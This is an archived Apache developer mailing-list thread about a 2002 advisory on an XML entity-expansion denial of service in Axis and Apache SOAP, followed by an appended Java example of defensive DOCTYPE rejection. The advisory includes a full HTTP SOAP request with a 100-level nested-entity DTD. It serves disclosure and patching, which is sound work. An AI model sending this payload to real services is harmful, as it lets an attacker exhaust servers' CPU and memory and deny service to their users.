I notice that the Axis solution is brute force: refuse to process any request with a DTD. Since Apache SOAP reads the envelope into a string before parsing it to a DOM, a similarly brute-force approach would be to refuse to process any envelope containing <!DOCTYPE. (If this were intended to be a valid part of parameter data, the < would be &lt;.)
Scott Nichol

----- Original Message -----
From: "Sanjiva Weerawarana" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Tuesday, November 26, 2002 4:46 PM
Subject: Re: Fw: Security Alert - Apache/Axis

> Note that this vulnerability exists in Apache SOAP because we use
> the DOM parser and there's no way to turn off entity expansion
> AFAIK. The only solution would be to do some Xerces specific thing
> and lose the JAXP capability .. which would suck.
>
> Sanjiva.
>
> ----- Original Message -----
> From: "Dirk-Willem van Gulik" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
> Cc: <[EMAIL PROTECTED]>
> Sent: Tuesday, November 26, 2002 4:27 PM
> Subject: Re: Fw: Security Alert - Apache/Axis
>
> > Tom/Dims,
> >
> > Could you folks verify this and report back to [EMAIL PROTECTED] that
> > each of those are 100% taken care of?
> >
> > Then security@ can report back to the various constituencies, work with
> > CERT if that is needed, etc. If you have any thoughts/statement which need
> > to be added - make sure you add that.
> >
> > Dw
> >
> > On Tue, 26 Nov 2002, Davanum Srinivas wrote:
> >
> > > I think tom fixed it
> > > (http://marc.theaimsgroup.com/?l=axis-dev&m=103773176108393&w=2)
> > >
> > > Thanks,
> > > dims
> > >
> > > --- Ted Leung <[EMAIL PROTECTED]> wrote:
> > > > This security alert came through today.
> > > >
> > > > Ted
> > > > ----- Original Message -----
> > > > From: "Ian Holsman" <[EMAIL PROTECTED]>
> > > > To: <[EMAIL PROTECTED]>
> > > > Cc: "Ory Segal" <[EMAIL PROTECTED]>
> > > > Sent: Tuesday, November 26, 2002 8:02 AM
> > > > Subject: Security Alert - Apache/Axis
> > > >
> > > > > Dear [EMAIL PROTECTED],
> > > > >
> > > > > During a recent security audit at one of our customers, Sanctum found a
> > > > > security vulnerability in your product Apache/Axis.
> > > > > The details of this vulnerability are described in the attached text file.
> > > > >
> > > > > We intend to issue a public advisory on BugTraq, SecuriTeam and other site
> > > > > forums about this vulnerability the last week of November. Please note,
> > > > > the advisory will not contain specifics that might enable someone to exploit
> > > > > the vulnerability.
> > > > >
> > > > > We would appreciate it if you could issue a patch in that timeline (i.e.
> > > > > around November 25th), so it can be linked to our advisory.
> > > > >
> > > > > Please feel free to contact me for more information/help.
> > > > >
> > > > > Thanks,
> > > > > -Amit
> > > > >
> > > > > <<XML_DTD_Axis.txt>>
> > > > >
> > > > > ---------------------------------------------------------------------
> > > > > To unsubscribe, e-mail: [EMAIL PROTECTED]
> > > > > For additional commands, e-mail: [EMAIL PROTECTED]
> > > >
> > > > ///////////////////////////////////////////////////////////////////////
> > > > ========================>> Security Advisory <<========================
> > > > ///////////////////////////////////////////////////////////////////////
> > > >
> > > > => Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/
> > > >
> > > > => Release date: 14/Nov/2002
> > > >
> > > > => Vendor: Apache Group
> > > >
> > > > The following product was found to be vulnerable:
> > > >
> > > > - Apache Axis SOAP server (checked with Xerces-J and Tomcat)
> > > >
> > > > The versions affected are the latest ones (as of October 2002).
> > > >
> > > > => Severity: High
> > > >
> > > > => CVE candidate: Not assigned yet.
> > > >
> > > > => Summary: Using the DTD part of the XML document, it is possible to cause the
> > > > XML parser to consume 100% CPU and/or a lot of memory, therefore resulting in
> > > > a denial of service condition.
> > > >
> > > > => Description: The DTD part of the XML document enables the document to define
> > > > named entities (other than the predefined &lt;, &gt;, etc.). The entities can be
> > > > defined using other entities (recursion is prohibited in XML 1.0).
> > > > Entities are expanded when they are referenced, inside the XML document.
> > > > The attack is comprised of defining and referencing an entity which is defined
> > > > using two instances of another entity, which is (in turn) defined as two instances
> > > > of yet another entity, and so on. This definition process can be repeated as long
> > > > as "necessary" - we found that a nesting level of 100 is usually sufficient.
> > > > The 100th entity should be defined simply as a string. This has the effect of having
> > > > the first entity contain, in theory, 2^99 (two to the power of ninety nine)
> > > > concatenated values of the 100th entity.
> > > > Here's an example (the DTD is to be placed after the XML declaration, and before the
> > > > root element of the XML document):
> > > >
> > > > <!DOCTYPE root [
> > > > <!ENTITY x100 "foobar">
> > > > <!ENTITY x99 "&x100;&x100;">
> > > > <!ENTITY x98 "&x99;&x99;">
> > > > <!ENTITY x97 "&x98;&x98;">
> > > > ...
> > > > <!ENTITY x3 "&x4;&x4;">
> > > > <!ENTITY x2 "&x3;&x3;">
> > > > <!ENTITY x1 "&x2;&x2;">
> > > > ]>
> > > >
> > > > Referring to the first entity inside a document that would otherwise be accepted by
> > > > the application (using the syntax &x1;), results in a DoS condition, due to the
> > > > excessive CPU load and/or memory load required by the XML parser to expand this entity.
> > > >
> > > > => Solution: Not available yet.
> > > >
> > > > => Workaround: Not available yet.
> > > >
> > > > => Example:
> > > >
> > > > Ory Segal from Sanctum devised a SOAP request that manages to mount this attack requiring
> > > > only a path to an existing web service to be known to the attacker.
> > > >
> > > > The request is:
> > > >
> > > > POST path_to_web_service HTTP/1.0
> > > > Host: ...
> > > > Content-Type: text/xml
> > > > SOAPAction: ""
> > > > Content-Length: 3224
> > > >
> > > > <?xml version="1.0" ?>
> > > > <!DOCTYPE foobar [
> > > > <!ENTITY x0 "hello">
> > > > <!ENTITY x1 "&x0;&x0;">
> > > > <!ENTITY x2 "&x1;&x1;">
> > > > <!ENTITY x3 "&x2;&x2;">
> > > > <!ENTITY x4 "&x3;&x3;">
> > > > <!ENTITY x5 "&x4;&x4;">
> > > > <!ENTITY x6 "&x5;&x5;">
> > > > <!ENTITY x7 "&x6;&x6;">
> > > > <!ENTITY x8 "&x7;&x7;">
> > > > <!ENTITY x9 "&x8;&x8;">
> > > > <!ENTITY x10 "&x9;&x9;">
> > > > <!ENTITY x11 "&x10;&x10;">
> > > > <!ENTITY x12 "&x11;&x11;">
> > > > <!ENTITY x13 "&x12;&x12;">
> > > > <!ENTITY x14 "&x13;&x13;">
> > > > <!ENTITY x15 "&x14;&x14;">
> > > > <!ENTITY x16 "&x15;&x15;">
> > > > <!ENTITY x17 "&x16;&x16;">
> > > > <!ENTITY x18 "&x17;&x17;">
> > > > <!ENTITY x19 "&x18;&x18;">
> > > > <!ENTITY x20 "&x19;&x19;">
> > > > <!ENTITY x21 "&x20;&x20;">
> > > > <!ENTITY x22 "&x21;&x21;">
> > > > <!ENTITY x23 "&x22;&x22;">
> > > > <!ENTITY x24 "&x23;&x23;">
> > > > <!ENTITY x25 "&x24;&x24;">
> > > > <!ENTITY x26 "&x25;&x25;">
> > > > <!ENTITY x27 "&x26;&x26;">
> > > > <!ENTITY x28 "&x27;&x27;">
> > > > <!ENTITY x29 "&x28;&x28;">
> > > > <!ENTITY x30 "&x29;&x29;">
> > > > <!ENTITY x31 "&x30;&x30;">
> > > > <!ENTITY x32 "&x31;&x31;">
> > > > <!ENTITY x33 "&x32;&x32;">
> > > > <!ENTITY x34 "&x33;&x33;">
> > > > <!ENTITY x35 "&x34;&x34;">
> > > > <!ENTITY x36 "&x35;&x35;">
> > > > <!ENTITY x37 "&x36;&x36;">
> > > > <!ENTITY x38 "&x37;&x37;">
> > > > <!ENTITY x39 "&x38;&x38;">
> > > > <!ENTITY x40 "&x39;&x39;">
> > > > <!ENTITY x41 "&x40;&x40;">
> > > > <!ENTITY x42 "&x41;&x41;">
> > > > <!ENTITY x43 "&x42;&x42;">
> > > > <!ENTITY x44 "&x43;&x43;">
> > > > <!ENTITY x45 "&x44;&x44;">
> > > > <!ENTITY x46 "&x45;&x45;">
> > > > <!ENTITY x47 "&x46;&x46;">
> > > > <!ENTITY x48 "&x47;&x47;">
> > > > <!ENTITY x49 "&x48;&x48;">
> > > > <!ENTITY x50 "&x49;&x49;">
> > > > <!ENTITY x51 "&x50;&x50;">
> > > > <!ENTITY x52 "&x51;&x51;">
> > > > <!ENTITY x53 "&x52;&x52;">
> > > > <!ENTITY x54 "&x53;&x53;">
> > > > <!ENTITY x55 "&x54;&x54;">
> > > > <!ENTITY x56 "&x55;&x55;">
> > > > <!ENTITY x57 "&x56;&x56;">
> > > > <!ENTITY x58 "&x57;&x57;">
> > > > <!ENTITY x59 "&x58;&x58;">
> > > > <!ENTITY x60 "&x59;&x59;">
> > > > <!ENTITY x61 "&x60;&x60;">
> > > > <!ENTITY x62 "&x61;&x61;">
> > > > <!ENTITY x63 "&x62;&x62;">
> > > > <!ENTITY x64 "&x63;&x63;">
> > > > <!ENTITY x65 "&x64;&x64;">
> > > > <!ENTITY x66 "&x65;&x65;">
> > > > <!ENTITY x67 "&x66;&x66;">
> > > > <!ENTITY x68 "&x67;&x67;">
> > > > <!ENTITY x69 "&x68;&x68;">
> > > > <!ENTITY x70 "&x69;&x69;">
> > > > <!ENTITY x71 "&x70;&x70;">
> > > > <!ENTITY x72 "&x71;&x71;">
> > > > <!ENTITY x73 "&x72;&x72;">
> > > > <!ENTITY x74 "&x73;&x73;">
> > > > <!ENTITY x75 "&x74;&x74;">
> > > > <!ENTITY x76 "&x75;&x75;">
> > > > <!ENTITY x77 "&x76;&x76;">
> > > > <!ENTITY x78 "&x77;&x77;">
> > > > <!ENTITY x79 "&x78;&x78;">
> > > > <!ENTITY x80 "&x79;&x79;">
> > > > <!ENTITY x81 "&x80;&x80;">
> > > > <!ENTITY x82 "&x81;&x81;">
> > > > <!ENTITY x83 "&x82;&x82;">
> > > > <!ENTITY x84 "&x83;&x83;">
> > > > <!ENTITY x85 "&x84;&x84;">
> > > > <!ENTITY x86 "&x85;&x85;">
> > > > <!ENTITY x87 "&x86;&x86;">
> > > > <!ENTITY x88 "&x87;&x87;">
> > > > <!ENTITY x89 "&x88;&x88;">
> > > > <!ENTITY x90 "&x89;&x89;">
> > > > <!ENTITY x91 "&x90;&x90;">
> > > > <!ENTITY x92 "&x91;&x91;">
> > > > <!ENTITY x93 "&x92;&x92;">
> > > > <!ENTITY x94 "&x93;&x93;">
> > > > <!ENTITY x95 "&x94;&x94;">
> > > > <!ENTITY x96 "&x95;&x95;">
> > > > <!ENTITY x97 "&x96;&x96;">
> > > > <!ENTITY x98 "&x97;&x97;">
> > > > <!ENTITY x99 "&x98;&x98;">
> > > > <!ENTITY x100 "&x99;&x99;">
> > > > ]>
> > > > <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
> > > > xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"
> > > > xmlns:xsd="http://www.w3.org/1999/XMLSchema">
> > > > <SOAP-ENV:Body>
> > > > <ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
> > > > <foobar xsi:type="xsd:string">&x100;</foobar>
> > > > </ns1:aaa>
> > > > </SOAP-ENV:Body>
> > > > </SOAP-ENV:Envelope>
> > >
> > > =====
> > > Davanum Srinivas - http://xml.apache.org/~dims/
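An added, defender-side illustration of the two mitigations discussed in this thread: the pre-parse string check proposed at the top of the message (refuse any envelope containing <!DOCTYPE while the envelope is still a String) and the parser-level alternative (the Xerces disallow-doctype-decl feature, set through the standard JAXP setFeature call). This is example code, not Apache SOAP's or Axis's own; the class name EnvelopeGuard and the sample envelopes are constructed for it.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;

// Example code (not Apache SOAP): guard an envelope held as a String before
// it reaches the DOM parser, so nested-entity DTDs are never expanded.
public class EnvelopeGuard {

    // Brute-force pre-parse check from the thread: any DTD is refused. A literal
    // "<" inside parameter data arrives as "&lt;", so valid payloads never match.
    static boolean containsDoctype(String envelope) {
        return envelope.contains("<!DOCTYPE");
    }

    // Parser-level defence: the Xerces feature disallow-doctype-decl, reachable
    // through JAXP's setFeature (the JDK's bundled parser honours it as well).
    // If the parser does not know the feature, this throws rather than silently
    // falling back to a parser that would expand the entities.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Both layers: cheap string check first, hardened parser second.
    static Document parseEnvelope(String envelope) throws Exception {
        if (containsDoctype(envelope)) {
            throw new SecurityException("SOAP envelope carries a DTD; refused");
        }
        byte[] bytes = envelope.getBytes(StandardCharsets.UTF_8);
        return hardenedBuilder().parse(new ByteArrayInputStream(bytes));
    }

    public static void main(String[] args) throws Exception {
        // Constructed samples: a benign envelope whose parameter holds an escaped "<",
        // and the same envelope prefixed with a three-level nested-entity DTD.
        String decl = "<?xml version=\"1.0\"?>";
        String body = "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\">"
            + "<SOAP-ENV:Body><p>&lt;ok&gt;</p></SOAP-ENV:Body></SOAP-ENV:Envelope>";
        String benign = decl + body;
        String withDtd = decl + "<!DOCTYPE e [<!ENTITY x0 \"hello\">"
            + "<!ENTITY x1 \"&x0;&x0;\"><!ENTITY x2 \"&x1;&x1;\">]>" + body;
        System.out.println("benign root: " + parseEnvelope(benign).getDocumentElement().getTagName());
        try { parseEnvelope(withDtd); } catch (SecurityException e) { System.out.println(e.getMessage()); }
    }
}
```

The string check alone is what the thread proposes; the hardened builder is what a deployment that keeps JAXP can add on top, since the feature is set through the portable API and fails loudly on a parser that lacks it.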